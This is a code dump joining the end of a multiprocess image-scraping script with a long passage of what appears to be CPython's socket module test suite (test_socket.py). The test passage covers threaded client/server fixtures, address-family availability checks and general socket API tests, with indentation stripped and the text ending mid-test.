num_per_proc = int(round(float(num_per_kw/procs_per_kw)))
for i in range(procs_per_kw):
start_index = i * num_per_proc
end_index = start_index + num_per_proc - 1
args_list.append((dir_name, keyword, start_index, end_index))
processes = [Process(target=download_images_from_b***u, args=x) for x in args_list]
print('Starting to download images with {} processes ...'.format(len(processes)))
for p in processes:
p.start()
for p in processes:
p.join()
print('Done!')
if __name__ == "__main__":
with open('keywords.txt', 'rb') as f:
foods = f.read().split()
download_images(foods, 2000, 3)
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
MAIN_TIMEOUT = 60.0
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
if socket.has_ipv6:
socket.AF_INET6
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testCrucialIpProtoConstants(self):
socket.IPPROTO_TCP
socket.IPPROTO_UDP
if socket.has_ipv6:
socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
socket.IPPROTO_ICLFXBM
socket.IPPROTO_ST
socket.IPPROTO_CBT
socket.IPPROTO_IGP
socket.IPPROTO_RDP
socket.IPPROTO_PGM
socket.IPPROTO_L2TP
socket.IPPROTO_SCTP
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_indextoname'),
'socket.if_indextoname() not available.')
def testInvalidInterfaceIndexToName(self):
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
'socket.if_nametoindex() not available.')
def testInvalidInterfaceNameToIndex(self):
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as s:
self.assertEqual(s.gettimeout(), None)
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
